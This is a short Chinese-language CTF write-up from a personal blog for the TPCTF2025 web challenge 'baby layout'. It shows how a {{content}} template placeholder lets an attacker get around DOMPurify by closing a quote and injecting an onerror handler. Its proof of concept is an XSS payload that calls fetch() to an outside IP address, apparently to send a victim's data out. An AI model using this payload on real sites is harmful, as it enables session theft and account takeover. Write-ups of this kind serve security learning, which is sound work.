TPCTF2025
TPCTF2025
WEB
baby layout
一道xss题目,一个界面输入xss一个界面访问
layout是你的模版,content占位上面的输入框
源代码中
1 | app.post('/api/layout', (req, res) => { |
使用了DOMPurify进行过滤,测试网站https://cure53.de/purify
我们输入的script,onerror,onload均被过滤
很明显外部库很难绕过
所以出题人给了我们{{content}}
可以闭合引号,自己创造一个onerror标签
就像这样:
Layout:
1 | <img |
Post:
1 | ccc" onerror="javascript:alert(1) |
代码成功执行
poc:
1 | aaaaaaaa" onerror="fetch('http://47.237.137.xxx:7777?' + |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dyinglight's blog!